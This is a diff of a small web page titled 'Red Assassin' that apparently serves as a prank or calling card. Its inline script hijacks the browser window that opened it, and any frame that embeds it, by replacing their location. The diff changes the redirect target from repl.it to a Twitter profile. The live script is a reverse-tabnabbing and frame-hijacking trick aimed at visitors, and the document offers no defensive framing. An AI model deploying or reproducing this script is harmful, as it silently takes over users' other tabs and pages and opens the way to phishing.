--- a/index.html
+++ b/index.html
@@ -3,8 +3,8 @@
 <head><title>Red Assassin</title></head>
 <body>
 <script>  
-if (window.opener) window.opener.parent.location.replace('http://repl.it');
-if (window.parent != window) window.parent.location.replace('http://repl.it');
+if (window.opener) window.opener.parent.location.replace('https://twitter.com/__d3f4u17__');
+if (window.parent != window) window.parent.location.replace('https://twitter.com/__d3f4u17__');
 </script>
 <h1>Red Assassin is here</h1>
 </body>
